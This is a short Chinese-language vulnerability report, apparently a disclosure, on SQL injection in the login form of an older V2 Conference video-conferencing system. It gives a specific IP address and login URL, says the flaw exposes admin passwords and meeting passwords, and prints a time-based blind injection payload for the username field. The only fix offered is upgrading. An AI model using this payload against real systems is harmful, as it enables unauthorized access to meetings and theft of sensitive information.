绿盟视频会议系统SQL注入

　　通过注入能够拿到管理账户密码，然后登录后台查看会议密码，通过会议密码能够进入到远程会议中，恶意攻击者能够窃取某些敏感信息。

　　http://211.151.49.196:18080/V2Conf/jsp/user/loginAction.do

　　其实是V2 Conference视频会议系统较低版本的SQL注入，注入发生在登录时用户名的输入框内，使用以下注入语句可测试：

　　1' or (select benchmark(300000,md5(user())) from users where substring(username,1,5)='admin')#

　　修复方案：

　　升级补丁